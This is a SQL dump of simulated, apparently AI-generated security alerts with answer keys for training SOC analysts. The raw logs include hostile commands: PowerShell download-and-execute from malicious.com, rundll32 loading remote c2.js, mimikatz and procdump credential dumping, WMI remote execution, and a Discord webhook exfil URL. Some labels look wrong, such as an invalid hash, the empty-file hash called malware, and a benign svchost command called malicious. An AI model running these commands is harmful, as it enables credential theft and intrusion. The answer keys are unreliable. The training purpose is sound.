(2130, 'Multi-Hop C2 Communication via Discord Detected', 'critical', 'Carbon Black', 'Malicious communication with a command-and-control server through Discord was detected, employing fast-flux DNS and heavy obfuscation.', 'Data Exfil', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.25\",\"dst_ip\":\"104.16.59.37\",\"username\":\"user1\",\"hostname\":\"WORKSTATION-01\",\"domain\":\"discordapp.com\",\"url\":\"https://discordapp.com/api/webhooks/1234567890/abcdefghij\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address communicating with external service\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"discordapp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain used for legitimate and malicious C2 communications\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://discordapp.com/api/webhooks/1234567890/abcdefghij\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with C2 activity via Discord\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The C2 communication pattern and use of Discord webhooks indicate exfiltration through legitimate services.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2131, 'DGA Domain Usage Indicative of C2 Communication', 'high', 'Sysmon', 'Detected use of a domain generation algorithm (DGA) domain for command-and-control communication, indicative of nation-state activity.', 'Malware', 'T1568', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:25Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.50\",\"dst_ip\":\"203.0.113.89\",\"username\":\"svc_account\",\"hostname\":\"BACKUP-SERVER\",\"domain\":\"xyz1234abcd.com\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in suspicious network activity\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xyz1234abcd.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"DGA domain used in known C2 infrastructure\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 communications\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of a DGA domain with associated malicious IP confirms command-and-control channel establishment.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2132, 'Process Hollowing Detected in Critical System Process', 'critical', 'CrowdStrike', 'A sophisticated process hollowing attack was detected in a critical system process, suggesting an attempt to hide malicious payloads in memory.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"192.168.4.40\",\"username\":\"system\",\"hostname\":\"MAIL-SERVER\",\"command_line\":\"svchost.exe -k netsvcs\",\"file_hash\":\"a54d88e06612d820bc3be72877c74f257b561b19\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in process hollowing\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"svchost.exe -k netsvcs\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with process hollowing in critical system processes\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a54d88e06612d820bc3be72877c74f257b561b19\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to advanced malware using process hollowing techniques\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of svchost.exe with unusual parameters and the associated hash confirms process hollowing activity.\"}', 'Expert', 'EDR', 9, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2133, 'Fileless PowerShell Malware Execution Detected', 'critical', 'CrowdStrike', 'A fileless PowerShell malware was executed on an internal server using process hollowing techniques. The malware communicates with a C2 server over Discord.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:42:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"198.51.100.32\",\"username\":\"svc_admin\",\"hostname\":\"server01.internal\",\"command_line\":\"powershell -nop -w hidden -enc JABQAG8AdwBlAHIAUwBoAGUAbABsAC4A\",\"file_hash\":\"3d5128a1a3c9c9e8f0d6b9f1a0e3f4g5\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.32\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 200 times for C2 communications.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -nop -w hidden -enc JABQAG8AdwBlAHIAUwBoAGUAbABsAC4A\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of fileless malware.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d5128a1a3c9c9e8f0d6b9f1a0e3f4g5\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware signature.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command and communication with a known malicious C2 IP confirm the presence of fileless malware.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2134, 'Credential Dumping via LSASS Detected', 'high', 'Carbon Black', 'Suspicious access to LSASS memory detected indicative of credential dumping. The attacker used procdump.exe to extract credentials.', 'Credential Attack', 'T1003.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:20:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.1.15\",\"dst_ip\":\"none\",\"username\":\"jdoe\",\"hostname\":\"workstation02.internal\",\"command_line\":\"procdump.exe -accepteula -ma lsass.exe dumpfile.dmp\",\"file_hash\":\"f2b1d9e8c9a6b8c4e2f1d3a9e8f4b7c6\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"procdump.exe -accepteula -ma lsass.exe dumpfile.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used for credential dumping from LSASS.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f2b1d9e8c9a6b8c4e2f1d3a9e8f4b7c6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious procdump usage.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of procdump.exe against LSASS and the associated hash confirm credential dumping activity.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2135, 'Lateral Movement Detected via WMI', 'critical', 'SentinelOne', 'Detected lateral movement attempt using WMI to execute commands on a remote host. The attacker leveraged a compromised admin account.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.2.2.14\",\"dst_ip\":\"10.2.2.20\",\"username\":\"admin_compromised\",\"hostname\":\"client01.internal\",\"command_line\":\"wmic /node:10.2.2.20 process call create \'cmd.exe /c whoami\'\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.2.2.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP is an internal asset.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:10.2.2.20 process call create \'cmd.exe /c whoami\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Use of WMI for remote command execution detected.\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The WMI command for remote execution and compromised admin account indicate an active lateral movement attempt.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2136, 'DGA Domain Activity Detected', 'high', 'Sysmon', 'Communication with a dynamically generated domain pattern observed, indicative of a botnet or malware C2 using fast-flux technique.', 'Malware', 'T1568.002', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:54:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.57\",\"username\":\"malware_user\",\"hostname\":\"infected_pc.internal\",\"domain\":\"xj12kl3r9df.xyz\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"xj12kl3r9df.xyz\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with malware C2 using DGA.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported multiple times for fast-flux activity.\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The DGA domain and fast-flux IP indicate sophisticated malware C2 activity.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2137, 'Memory-Only Payload Detected via Process Hollowing', 'critical', 'CrowdStrike', 'A memory-only payload was executed on an endpoint using process hollowing. The malware initiates multi-hop C2 communications.', 'Malware', 'T1055.012', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.50\",\"dst_ip\":\"198.51.100.45\",\"username\":\"user123\",\"hostname\":\"desktop03.internal\",\"command_line\":\"rundll32.exe hollowed.dll,EntryPoint\",\"file_hash\":\"a2c5b7e9f8e4d3c2b1f6d9a8b3c4e7f5\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multi-hop C2 communication patterns.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rundll32.exe hollowed.dll,EntryPoint\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Process hollowing technique detected.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a2c5b7e9f8e4d3c2b1f6d9a8b3c4e7f5\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches with known memory-only payload.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of process hollowing and communication with a known malicious IP confirm the presence of advanced memory-only malware.\"}', 'Expert', 'EDR', 9, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2138, 'APT-Level PowerShell Fileless Malware Detected', 'critical', 'CrowdStrike', 'A fileless malware attack was detected using PowerShell to execute malicious scripts from memory. The attack involved credential dumping from LSASS.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:23:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"host001\",\"command_line\":\"powershell -nop -w hidden -ep bypass -c \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/ps.ps1\')\\\"\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell -nop -w hidden -ep bypass -c \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/ps.ps1\')\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PowerShell script used for fileless malware delivery\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1024 times for hosting malicious content\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with PowerShell-based malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of PowerShell indicates a fileless attack aimed at avoiding detection by traditional antivirus solutions.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2139, 'Credential Dumping via LSASS Detected', 'high', 'Carbon Black', 'A sophisticated attack attempt was identified where credentials were dumped from the LSASS process using a known tool.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"username\":\"alice\",\"hostname\":\"server02\",\"command_line\":\"procdump.exe -accepteula -ma lsass.exe lsass.dmp\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"procdump.exe -accepteula -ma lsass.exe lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Procdump used for unauthorized credential access\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"lsass.dmp\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Memory dump of LSASS process containing sensitive credentials\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of Procdump to access LSASS memory is a known technique for extracting credentials.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2140, 'Lateral Movement Detected via WMI', 'critical', 'SentinelOne', 'An attacker leveraged WMI for lateral movement within the network, targeting multiple internal hosts.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:15Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.25\",\"username\":\"bsmith\",\"hostname\":\"workstation01\",\"command_line\":\"wmic /node:10.0.0.25 process call create \\\"powershell -nop -w hidden -ep bypass -c Invoke-Mimikatz\\\"\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"wmic /node:10.0.0.25 process call create \\\"powershell -nop -w hidden -ep bypass -c Invoke-Mimikatz\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI used for remote code execution and credential harvesting\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of compromised machine within the internal network\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Target IP of the lateral movement attempt\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI indicates an advanced persistence and lateral movement strategy.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2141, 'Fast-Flux DNS Detected in Malicious Activity', 'high', 'Sysmon', 'DNS queries for known fast-flux domains associated with C2 communications were detected.', 'Data Exfil', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:10:50Z\",\"event_type\":\"dns_query\",\"src_ip\":\"10.0.0.20\",\"domain\":\"suspect-domain.xyz\",\"hostname\":\"desktop01\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"suspect-domain.xyz\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with fast-flux networks used for data exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the system querying the malicious domain\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Fast-flux domains are often used for evasive C2 communications in data exfiltration campaigns.\"}', 'Expert', 'EDR', 9, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2142, 'Subtle Indicators of Memory-Only Payload Detected', 'critical', 'CrowdStrike', 'Heavy obfuscation and memory-only payloads were detected, indicating an advanced persistent threat using legitimate services for C2.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:05:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"104.21.45.78\",\"username\":\"cmiller\",\"hostname\":\"laptop03\",\"command_line\":\"rundll32.exe javascript:\\\"\\\\..\\\\mshtml,RunHTMLApplication \\\";document.write(\'<script src=http://legit-service.com/c2.js></script>\');\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"rundll32.exe javascript:\\\"\\\\..\\\\mshtml,RunHTMLApplication \\\";document.write(\'<script src=http://legit-service.com/c2.js></script>\');\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Obfuscated command using rundll32 for memory-only payload execution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"104.21.45.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to C2 communications via legitimate service abuse\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of legitimate services for command and control indicates an attempt to blend in with normal traffic.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2143, 'Fileless Malware Detected via PowerShell Script Execution', 'critical', 'CrowdStrike', 'A sophisticated PowerShell script was executed, utilizing obfuscation techniques to evade detection. This script is associated with a fileless malware campaign targeting credential dumping.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:45:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.5\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-01\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand aGVsbG8gd29ybGQ=\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PowerShell command linked to fileless malware activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with victim machine\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands is indicative of fileless malware, warranting a true positive classification.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2144, 'Credential Dumping Detected from LSASS Memory', 'high', 'SentinelOne', 'A process attempted to access LSASS memory to extract credentials using advanced techniques. The process was associated with known malware.', 'Credential Attack', 'T1003.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:22:34Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.15\",\"dst_ip\":\"192.168.10.20\",\"username\":\"admin\",\"hostname\":\"SERVER-02\",\"command_line\":\"mimikatz.exe privilege::debug sekurlsa::logonpasswords\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"mimikatz.exe privilege::debug sekurlsa::logonpasswords\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Mimikatz used for credential dumping, reported in multiple incidents\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with attacker machine\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The process execution with Mimikatz indicates a credential dumping attempt, confirming the alert as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2145, 'Lateral Movement Detected via WMI', 'high', 'Carbon Black', 'Anomalous WMI activity detected, indicating potential lateral movement within the network. The attacker is leveraging WMI to execute processes on remote hosts.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T04:50:47Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.20.30\",\"dst_ip\":\"192.168.20.40\",\"username\":\"svc_account\",\"hostname\":\"WORKSTATION-03\",\"command_line\":\"wmic /node:192.168.20.40 process call create \\\"cmd.exe /c tasklist\\\"\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"wmic /node:192.168.20.40 process call create \\\"cmd.exe /c tasklist\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"WMI command detected in lateral movement scenarios\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.20.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI for remote process execution is a known lateral movement tactic, validating the alert as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2146, 'Multi-hop C2 Communication via Discord Detected', 'critical', 'Sysmon', 'Detected multi-hop command and control communication utilizing Discord as the intermediary. This technique is used to obfuscate traffic and evade detection.', 'C2 Communication', 'T1071.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:53Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.30.45\",\"dst_ip\":\"162.159.137.54\",\"username\":\"user123\",\"hostname\":\"LAPTOP-04\",\"command_line\":\"discord.exe --remote-debugging-port=9222\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"162.159.137.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 infrastructure, detected in multiple campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"discord.exe --remote-debugging-port=9222\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command line indicative of abuse for C2 communication via Discord\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of Discord for C2 communication, combined with known malicious IPs, confirms the alert as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2147, 'Fast-flux DNS Detected for DGA Domain', 'high', 'CrowdStrike', 'A domain generated algorithmically (DGA) is using fast-flux DNS techniques, indicating potential malware activity. This method is used for evading detection by frequently changing IP addresses.', 'Malware', 'T1568.002', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:28Z\",\"event_type\":\"dns_request\",\"src_ip\":\"192.168.40.50\",\"dst_ip\":\"198.51.100.76\",\"username\":\"it_admin\",\"hostname\":\"SERVER-05\",\"request_body\":\"xy1z2abc3d4ef.example.com\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"xy1z2abc3d4ef.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"DGA domain associated with known malware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.76\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in fast-flux DNS activity\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detection of a DGA domain with fast-flux DNS is a strong indicator of malicious activity, justifying the true positive verdict.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
